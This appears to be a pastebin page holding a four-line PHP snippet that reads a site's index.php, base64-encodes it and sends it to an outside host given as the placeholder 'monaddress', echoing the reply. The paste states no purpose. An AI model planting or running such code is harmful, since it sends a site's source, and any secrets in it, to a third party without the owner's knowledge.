Facebook
From Speedy Motmot, 4 Years ago, written in Plain Text.
This paste is a reply to Re: Untitled from Beige Hog - view diff
Embed
Download Paste or View Raw
Hits: 262
  1. <?php
  2.         $myindex = base64_encode(file_get_contents('index.php'));
  3.         echo file_get_contents('http://monaddress/test.php?myindex='.$myindex);
  4. ?>